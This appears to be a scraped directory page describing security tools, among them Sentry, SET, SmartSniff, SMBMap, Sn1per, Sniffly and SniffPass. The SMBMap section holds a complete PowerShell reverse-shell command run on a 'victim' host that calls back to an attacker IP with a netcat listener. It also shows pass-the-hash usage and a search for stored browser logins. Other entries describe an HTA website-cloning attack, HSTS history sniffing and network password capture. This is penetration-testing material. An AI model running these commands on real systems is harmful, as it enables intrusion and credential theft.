    After running SecuritySoftView, the main window displays the list of all AntiVirus/AntiSpyware/Firewall programs that are currently registered with the security center of Windows operating system. Be aware that the same software might appear more than once, but different product type.

    Command-Line Options
    /stext <Filename> Save the list of security programs into a simple text file.
    /stab <Filename> Save the list of security programs into a tab-delimited text file.
    /scomma <Filename> Save the list of security programs into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of security programs into a tabular text file.
    /shtml <Filename> Save the list of security programs into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of security programs into HTML file (Vertical).
    /sxml <Filename> Save the list of security programs into XML file.     


    Download SecuritySoftView

    Sentry - Bruteforce Attack Blocker (ssh, FTP, SMTP, and more)


    Sentry detects and prevents bruteforce attacks against sshd using minimal system resources.

    SAFE

    To prevent inadvertant lockouts, Sentry manages a whitelist of IPs that have connected more than 3 times and succeeded at least once. Never again will that forgetful colleague behind the office NAT router get us locked out of our system. Nor the admin whose script just failed to login 12 times in 2 seconds.

    Sentry includes support for adding IPs to a firewall. Support for IPFW, PF, ipchains is included. Firewall support is disabled by default. This is because firewall rules may terminate existing session(s) to the host (attn IPFW users). Get your IPs whitelisted (connect 3x or use --whitelist) before enabling the firewall option.

    SIMPLE

    Sentry has an extremely simple database for tracking IPs. This makes it very easy for administrators to view and manipulate the database using shell commands and scripts. See the EXAMPLES section.
    Sentry is written in perl, which is installed everywhere you find sshd. It has no dependencies. Installation and deployment is extremely simple.

    FLEXIBLE

    Sentry supports blocking connection attempts using tcpwrappers and several popular firewalls. It is easy to extend sentry to support additional blocking lists.

    Sentry was written to protect the SSH daemon but anticipates use with other daemons. SMTP support is planned. As this was written, the primary attack platform in use is bot nets comprised of exploited PCs on high-speed internet connections. These bots are used for carrying out SSH attacks as well as spam delivery. Blocking bots prevents multiple attack vectors.

    The programming style of sentry makes it easy to insert code for additonal functionality.

    EFFICIENT

    The primary goal of Sentry is to minimize the resources an attacker can steal, while consuming minimal resources itself. Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter) expect to run as a daemon, tailing a log file. That requires a language interpreter to always be running, consuming at least 10MB of RAM. A single hardware node with dozens of virtual servers will lose hundreds of megs to daemon protection.

    Sentry uses resources only when connections are made. The worse case scenario is the first connection made by an IP, since it will invoke a perl interpreter. For most connections, Sentry will append a timestamp to a file, stat for the presense of another file and exit.

    Once an IP is blacklisted for abuse, whether by tcpd or a firewall, the resources it can consume are practically zero.

    Sentry is not particularly efficient for reporting. The "one file per IP" is superbly minimal for logging and blacklisting, but nearly any database would perform better for reporting. Expect to wait a few seconds for sentry --report.


    REQUIRED ARGUMENTS
    • ip
      An IPv4 address. The IP should come from a reliable source that is difficult to spoof. Tcpwrappers is an excellent source. UDP connections are a poor source as they are easily spoofed. The log files of TCP daemons can be good source if they are parsed carefully to avoid log injection attacks.
    All actions except report and help require an IP address. The IP address can be manually specified by an administrator, or preferably passed in by a TCP server such as tcpd (tcpwrappers), inetd, or tcpserver (daemontools).


    ACTIONS
    • blacklist
      deny all future connections
    • whitelist
      whitelist all future connections, remove the IP from the blacklists, and make it immune to future connection tests.
    • delist
      remove an IP from the white and blacklists. This is useful for testing that sentry is working as expected.
    • connect
      register a connection by an IP. The connect method will log the attempt and the time. See CONNECT.
    • update
      Check the most recent version of sentry against the installed version and update if a newer version is available.


    EXAMPLES

    IP REPORT
    $ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
       9 connections from 24.19.45.95
           and it is whitelisted
    

    HOME GATEWAY REPORT
    $ /var/db/sentry/sentry.pl -r
      -------- summary ---------
      1614 unique IPs have connected 76525 times
      1044 IPs are blacklisted
        18 IPs are whitelisted
    

    WEB SERVER REPORT
    $ /var/db/sentry/sentry.pl -r
     -------- summary ---------
     1240 unique IPs have connected 285554 times
       40 IPs are blacklisted
        4 IPs are whitelisted
    

    EUROPEAN DNS MIRROR
    $ /var/db/sentry/sentry.pl -r
    -------- summary ---------
    3484 unique IPs have connected 15391 times
    1127 IPs are blacklisted
       6 IPs are whitelisted
    


    Download Sentry

    SET v6.5 - The Social-Engineer Toolkit “Mr Robot”


    The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

    The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 12 months since its release, “Metasploit: The Penetrations Tester’s Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

    The next major revision of The Social-Engineer Toolkit (SET) v6.5 codename “Mr Robot” has just been released. The codename is in celebration of the TV show Mr Robot featuring SET last night! Kudos to them for having some amazing tech writers and appreciate the shoutout on the show.


     This version incorporates a new HTA web attack vector (thanks Justin Elze aka ginger) for sharing the attack vector with me. This attack allows you to clone a website and inject an HTA file which compromises the system.

    Additionally, SET added a lot of the new exploits including the hacking team adobe zero-day, and others from Metasploit.

    Full changelog below:
    ~~~~~~~~~~~~~~~~
    version 6.5
    ~~~~~~~~~~~~~~~~
    * added brand new attack vector HTA attack and incorporated powershell injection into it
    * fixed a prompt that would cause double IP questions in certain attack vectors
    * slimmed down powershell injection http/https attack vectors in order to use in payload delivery
    * added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
    * added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
    * added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

    Supported platforms
    • Linux
    • Windows (experimental)

    Download SET v6.5 

    ShellCheck - Automatically Detects Problems with sh/bash Scripts and Commands


    ShellCheck is a static analysis and linting tool for sh/bash scripts. It's mainly focused on handling typical beginner and intermediate level syntax errors and pitfalls where the shell just gives a cryptic error message or strange behavior, but it also reports on a few more advanced issues where corner cases can cause delayed failures.

    Haskell source code is available on GitHub!

    Run ShellCheck online

    SIMP - System Integrity Management Platform


    SIMP is a framework that aims to provide a reasonable combination of security compliance and operational flexibility.

    The ultimate goal of the project is to provide a complete management environment focused on compliance with the various profiles in the SCAP Security Guide Project and industry best practice.

    Though it is fully capable out of the box, the intent of SIMP is to be molded to your target environment in such a way that deviations are easily identifiable to both Operations Teams and Security Officers.

    Supported Operating Systems

    The following Operating Systems are supported:
    • Red Hat Enterprise Linux
      • 6.6
      • 7.1
    • CentOS
      • 6.6
      • 7.1-1503-01

    Technology components

    SIMP uses Puppet to manage and maintain the configuration of the various component systems.
    Though there are many possible configurations, out of the box SIMP provides:
    • Management
      • Puppet Server
      • PuppetDB
      • MCollective
    • Authentication
      • OpenLDAP
    • Kickstart/Update
      • YUM
      • DNS
      • DHCP
      • TFTP

    SIMP Provided Materials

    Build Materials

    Puppet Modules

    Forked External Modules

    Most forks are simply to fit the materials into our build processes but some have modifications that we are looking to push back upstream when possible.


    Download SIMP

    SmartSniff v2.16 - Capture TCP/IP packets on your network adapter


    SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for non-text base protocols, like DNS) 

    SmartSniff provides 3 methods for capturing TCP/IP packets :
    1. Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
    2. WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems. (Windows 98/ME/NT/2000/XP/2003/Vista) In order to use it, you have to download and install WinPcap Capture Driver from this Web site. (WinPcap is a free open-source capture driver.) 
      This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
    3. Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic. 
      The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.    

    System Requirements

    SmartSniff can capture TCP/IP packets on any version of Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as WinPcap capture driver is installed and works properly with your network adapter. 

    You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.

    Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using 'Raw Sockets' method. However, this capture method has some limitations and problems:
    • Outgoing UDP and ICMP packets are not captured.
    • On Windows XP SP1 outgoing packets are not captured at all - Thanks to Microsoft's bug that appeared in SP1 update... 
      This bug was fixed on SP2 update, but under Vista, Microsoft returned back the outgoing packets bug of XP/SP1.
    • On Windows Vista/7/8: Be aware that Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of Windows operating system. If you only see the outgoing traffic, try to turn off Windows firewall, or add smsniff.exe to the allowed programs list of Windows firewall.   

    Download SmartSniff v2.16

    SmartSniff v2.17 - Capture TCP/IP packets on your network adapter


    SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for non-text base protocols, like DNS)
    SmartSniff provides 3 methods for capturing TCP/IP packets :
    1. Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
    2. WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems. (Windows 98/ME/NT/2000/XP/2003/Vista) In order to use it, you have to download and install WinPcap Capture Driver from this Web site. (WinPcap is a free open-source capture driver.) 
      This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
    3. Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic. 
      The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site
      Notice: If WinPcap is installed on your system, and you want to use the Microsoft Network Monitor Driver method, it's recommended to run SmartSniff with /NoCapDriver, because the Microsoft Network Monitor Driver may not work properly when WinPcap is loaded too.   

    Using SmartSniff

    In order to start using SmartSniff, simply copy the executable (smsniff.exe) to any folder you like, and run it (installation is not needed).
    After running SmartSniff, select "Start Capture" from the File menu, or simply click the green play button in the toolbar. If it's the first time that you use SmartSniff, you'll be asked to select the capture method and the network adapter that you want to use. If WinPcap is installed on your computer, it's recommended to use this method to capture packets.
    After selecting the capture method and your network adapter, click the 'OK' button to start capturing TCP/IP packets. while capturing packets, try to browse some Web sites, or retrieve new emails from your email software. After stopping the capture (by clicking the red stop button) SmartSniff displays the list of all TCP/IP conversations the it captured. When you select a specific conversation in the upper pane, the lower pane displays the TCP/IP streams of the selected client-server conversation.
    If you want the save the captured packets for viewing them later, use "Save Packets Data To File" option from the File menu.

    Display Mode

    SmartSniff provides 3 basic modes to display the captured data: Automatic, Ascii, and Hex Dump. On Automatic mode (the default), SmartSniff checks the first bytes of the data stream - If it contains characters lower than 0x20 (excluding CR, LF and tab characters), it displays the data in Hex mode. otherwise, it displays it in Ascii mode.
    You can easily switch between display modes by selecting them from the menu, or by using F2 - F4 keys. Be aware that 'Hex Dump' mode is much slower than Ascii mode.
    Starting from version 1.35, there is a new mode - 'URL List'. This mode only display the URL addresses list (http://...) found in the captured packets.

    Exporting the captured data

    SmartSniff allows you to easily export the captured data for using it in other applications:
    • The upper pane: you can select one or more items in the upper pane, and then copy them to the clipboard (You can paste the copied items into Excel or into spreadsheet of OpenOffice.org) or save them to text/HTML/XML file (by using 'Save Packet Summaries').
    • The lower pane: You can select any part of the TCP/IP streams (or select all text, by using Ctrl+A), copy the selected text to the clipboard, and then paste it to Notepad, Wordpad, MS-Word or any other editor. When you paste the selected streams to document of Wordpad, OpenOffice.org, or MS-Word, the colors are also transferred. 
      Your can also export the TCP/IP streams to text file, HTML file, or raw data file, by using "Export TCP/IP Streams" option. 

    Capture and Display Filters

    Starting from version 1.10, you can filter unwanted TCP/IP activity during the capture process (Capture Filter), or when displaying the captured TCP/IP data (Display Filter).
    For both filter types, you can add one or more filter strings (separated by spaces or CRLF) in the following syntax:
    [include | exclude] : [local | remote | both] : [tcp | udp | tcpudp | icmp | all] : [IP Range | Ports Range]
    Here's some examples that demonstrate how to create a filter string:
    • Display only packets with remote tcp port 80 (Web sites): 
      include:remote:tcp:80
    • Display only packets with remote tcp port 80 (Web sites) and udp port 53 (DNS): 
      include:remote:tcp:80 
      include:remote:udp:53
    • Display only packets originated from the following IP address range: 192.168.0.1 192.168.0.100: 
      include:remote:all:192.168.0.1-192.168.0.100
    • Display only TCP and UDP packets that use the following port range: 53 - 139: 
      include:both:tcpudp:53-139
    • Filter most BitTorrent packets (port 6881): 
      exclude:both:tcpupd:6881
    • Filter all ICMP packets (Ping/Traceroute activity): 
      exclude:both:icmp
    Notice: A single filter string must not include spaces !

    Live Mode

    Starting from version 1.10, a new option was added to 'Advanced Options' section - 'Live Mode'. When SmartSniff capture packets in live mode, the TCP/IP conversations list is updated while capturing the packets, instead of updating it only after the capture is finished. Be aware that "Live Mode" requires more CPU resources than non-live mode. So if your computer is slow, or your have a very high traffic on your network, it's recommended to turn off this option.
    Starting from version 1.20, you can also view the content of each TCP/IP conversation (in the lower pane) while capturing the packets. However, if the TCP/IP conversation is too large, you won't be able to watch the entire TCP/IP conversation until the capture is stopped.

    Viewing process information

    Starting from version 1.30, you can view the process information (ProcessID and process filename) for captured TCP packets. However, this feature have some limitations and problems:
    • Process information is only displayed for TCP packets (It doesn't work with UDP)
    • Process information may not be displayed for TCP connections that closed after short period of time.
    • Retrieving process information consume more CPU resources and may slow down your computer. It's not recommended to use this feature if you have intensive network traffic.
    • Process information is currently not saved in ssp file.
    In order to activate this feature, go to 'Advanced Options' dialog-box, check the "Retrieve process information while capturing packets" option and click the 'OK' button. 2 new columns will be added: ProcessID and Process Filename. Start capturing, and process information will be displayed for the captured TCP conversations.

    The structure of .ssp file (SmartSniff Packets File)

    The structure of .ssp file saved by SmartSniff is very a simple. It contains one main header in the beginning of the file, followed by sequence of all TCP/IP packets, each of them begins with a small header.
    The main header structure:
    00 - SMSNF200 signature.
    08 - (2 bytes) The number of bytes in the header (currently 4 bytes for the IP Address)
    0A - (4 bytes) IP Address
    Header of each packet:
    00 (2 Bytes) packet header size (currently 0x18 bytes)
    02 (4 Bytes) number of received bytes in packet.
    06 (8 Bytes) Packet time in Windows FILETIME format.
    0E (6 Bytes) Source Mac Address.
    14 (6 Bytes) Dest. Mac Address.
    1A The remaining bytes are the TCP/IP packet itself.    


    Download SmartSniff v2.17

    SmarTTY - Multi-tabbed SSH Client with SCP Support


    SmarTTY is a free multi-tabbed SSH client that supports copying files and directories with SCP on-the-fly and editing files in-place.

    One SSH session - multiple tabs
    Most SSH servers support up to 10 sub-sessions per connection. SmarTTY makes the best of it: no annoying multiple windows, no need to relogin, just open a new tab and go!

    Transfer files and whole directories
    • Explore remote directory structure with Windows-style GUI
    • Download and upload single files with SCP protocol
    • Transfer entire directories with recursive SCP
    • Quickly send and receive directories with on-the-fly TAR

    Edit files in-place
    Select "File->Open" to open an editor tab for a remote file:
    • Native Windows file editing look & feel
    • Automatic CRLF to LF conversion
    • Option to invoke 'sudo' to save protected files

    Built-in hex terminal for COM ports
    Simply select "Setup new serial or TCP connection" to conveniently communicate with your embedded device:
    • View data in ASCII, HEX or both
    • Save communication logs to files
    • Automatically group data packets based on time of arrival

    Out-of-the-box public-key auth
    SmarTTY can automatically configure public key authentication for selected remote computers:
    • No need to enter your password each time
    • Private key is securely stored in Windows key container
    • One-click configuration of remote host
    • Your Unix password is not stored anywhere

    Run graphical applications seamlessly
    SmarTTY comes with a pre-built XMing X11 server. The server will be configured and started on-the-fly as soon as you launch a graphical application in terminal:
    • Remote X11 apps run out-of-the-box
    • No need to configure anything manually

    SMBMap - Samba Share Enumerator


    SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

    Some of the features have not been thoroughly tested, so changes will be forth coming as bugs are found. I only really find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports would be appreciated. It's definitely rough around the edges, but I'm just trying to pack in features at the moment. Version 2.0 should clean up the code a lot….whenever that actually happens ;). Thanks for checking it out!! Planned features include simple remote shell (instead of the god awful powershell script in the examples), actual logging, shadow copying ntds.dit automation (Win7 and up only..for now), threading, other things….

    Features:
    • Pass-the-Hash Support
    • File upload/download/delete
    • Permission enumeration (writable share, meet Metasploit)
    • Remote Command Execution
    • Distrubted file content searching (new!)
    • File name matching (with an auto downoad capability)

    Help
    SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
    
    optional arguments:
      -h, --Help            show this help message and exit
    
    Main arguments:
      -H HOST               IP of host
      --host-file FILE      File containing a list of hosts
      -u USERNAME           Username, if omitted null session assumed
      -p PASSWORD           Password or NTLM hash
      -s SHARE              Specify a share (default C$), ex 'C$'
      -d DOMAIN             Domain name (default WORKGROUP)
      -P PORT               SMB port (default 445)
    
    Command Execution:
      Options for executing commands on the specified host
    
      -x COMMAND            Execute a command ex. 'ipconfig /r'
    
    Filesystem Search:
      Options for searching/enumerating the filesystem of the specified host
    
      -L                    List all drives on the specified host
      -R [PATH]             Recursively list dirs, and files (no share\path lists
                            ALL shares), ex. 'C$\Finance'
      -r [PATH]             List contents of directory, default is to list root of
                            all shares, ex. -r 'C$\Documents and
                            Settings\Administrator\Documents'
      -A PATTERN            Define a file name pattern (regex) that auto downloads
                            a file on a match (requires -R or -r), not case
                            sensitive, ex '(web|global).(asax|config)'
      -q                    Disable verbose output (basically only really useful
                            with -A)
    
    File Content Search:
      Options for searching the content of files
    
      -F PATTERN            File content search, -F '[Pp]assword' (requies admin
                            access to execute commands, and powershell on victim
                            host)
      --search-path PATH    Specify drive/path to search (used with -F, default
                            C:\Users), ex 'D:\HR\'
    
    Filesystem interaction:
      Options for interacting with the specified host's filesystem
    
      --download PATH       Download a file from the remote system,
                            ex.'C$\temp\passwords.txt'
      --upload SRC DST      Upload a file to the remote system ex.
                            '/tmp/payload.exe C$\temp\payload.exe'
      --delete PATH TO FILE
                            Delete a remote file, ex. 'C$\temp\msf.exe'
      --skip                Skip delete file confirmation prompt
    
    Examples:
    
    $ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
    $ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
    $ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'
    
    Default Output:
    $  python smbmap.py --host-file smb-hosts.txt -u jsmith -p 'R33nisP!nckl3' -d ABC
    [+] Reading from stdin
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.0.5:445 Name: unkown                                            
            Disk                                                    Permissions
            ----                                                    -----------
            ADMIN$                                                  READ, WRITE
            C$                                                      READ, WRITE
            IPC$                                                    NO ACCESS
            TMPSHARE                                                READ, WRITE
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
            Disk                                                    Permissions
            ----                                                    -----------
            IPC$                                                    NO ACCESS
            print$                                                  READ, WRITE
            My Dirs                                                 NO ACCESS
            WWWROOT_OLD                                             NO ACCESS
            ADMIN$                                                  READ, WRITE
            C$                                                      READ, WRITE
    
    Command execution:
    $ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
    Group name     Domain Admins
    Comment        Designated administrators of the domain
    
    Members
    
    -------------------------------------------------------------------------------
    abcadmin                  
    The command completed successfully.
    
    Non recursive path listing (ls):
    $ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 172.16.0.24:445 Name: 172.16.0.24                                       
        Disk                                                    Permissions
        ----                                                    -----------
        C$                                                      READ, WRITE
        .Users                                             
        dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
        dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
        dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
        dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
        dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
        dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
        fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
        dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
        dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus
    
    File Content Searching:
    $ python smbmap.py -H 192.168.1.203 -u Administrator -p p00p1234! -F password --search-path 'C:\Users\wingus\AppData\Roaming'
    [!] Missing domain...defaulting to WORKGROUP
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.1.203:445 Name: unkown                                            
    [+] File search started on 1 hosts...this could take a while
    [+] Job 861d4cd845124cad95d42175 started on 192.168.1.203, result will be stored at C:\Windows\TEMP\861d4cd845124cad95d42175.txt
    [+] Grabbing search results, be patient, share drives tend to be big...
    [+] Job 1 of 1 completed
    [+] All jobs complete
    Host: 192.168.1.203       Pattern: password
    C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\logins.json
    C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\prefs.js
    
    Drive Listing:
    This feature was added to compliment the file content searching feature
    $ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L 
    [!] Missing domain...defaulting to WORKGROUP
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.1.24:445 Name: unkown                                            
    [+] Host 192.168.1.24 Local Drives: C:\ D:\
    [+] Host 192.168.1.24 Net Drive(s):
        E:      \\vboxsrv\Public      VirtualBox Shared Folders
    
    Nifty Shell:
    Run Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell connects back to)
    $ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
    [!] Error encountered, sharing violation, unable to retrieve output
    
    Attackers Netcat Listener:
    $ nc -l 4445
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>whoami
     nt authority\system
    


    Download SMBMap

    Sn1per - Automated Pentest Recon Scanner

    Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

    Features
    • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
    • Automatically launches Google hacking queries against a target domain
    • Automatically enumerates open ports
    • Automatically brute forces sub-domains and DNS info
    • Automatically runs targeted nmap scripts against open ports
    • Automatically scans all web applications for common vulnerabilities
    • Automatically brute forces all open services

    Install
    chmod +x install.sh
    ./install.sh
    Installs all dependencies. Best run from Kali Linux.

    Usage
    ./sn1per

    SAMPLE REPORT:
    https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per%2520Sample%2520Report


    Download Sn1per

    Sniffly - Sniffing Browser History Using HSTS + CSP.


    Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.
    More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf .

    Demo
    Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

    How it works
    I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:
    1. User visits Sniffly page
    2. Browser attempts to load images from various HSTS domains over HTTP
    3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
    4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

    Finding HSTS hosts
    To scrape an included list of sites ( util/strict-transport-security.txt , courtesy Scott Helme) to determine which hosts send HSTS headers, do:
    $ cd util
    $ ./run.sh <number_of_batches> > results.log
    
    where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.
    To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:
    $ cd util
    $ ./process.py <results_file> > processed.log
    
    Once that's done, you can copy the hosts from processed.log into src/index.js .

    Running sploitz
    Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:
    server {
        listen 8081;
        server_name localhost;
        location / {
            root /path/to/sniffly/src;
            add_header Content-Security-Policy "img-src http:";
            index index.html;
        }
    }
    
    Or in .htaccess :
    <IfModule mod_headers.c>
    Header set Content-Security-Policy "img-src http:"
    </IfModule>
    
    Or send the header via php .
    Paste this at the start of the script (and change the name to index.php):
    <?php
        $csp_rules = "img-src http:";
        // Just to ensure maximum compatibility
        header('X-WebKit-CSP: '.$csp_rules);
        header('X-Content-Security-Policy: '.$csp_rules);
        header('Content-Security-Policy: '.$csp_rules);
    ?>

    Caveats
    • Not supported yet in Safari, IE, or Chrome on iOS.
    • Extensions such as HTTPS Everywhere will mess up results.
    • Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond.
    • Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

    Acknowledgements
    • Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M.
    • Chris Palmer for advising on how to file a privacy bug in Chrome.
    • Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented.
    • Jan Schaumann and Chris Rohlf for being early testers.
    • Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are!


    Download Sniffly

    SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)


    SniffPass is small password monitoring software that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). 

    You can use this utility to recover lost Web/FTP/Email passwords.

    Using SniffPass

    In order to start using SniffPass, follow the instructions below:
    1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. 
      You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly in many systems.
    2. Run the executable file of SniffPass (SniffPass.exe).
    3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use. 
      After you select the desired capture options, SniffPass listen to your network adapter, and display instantly any password that it find.
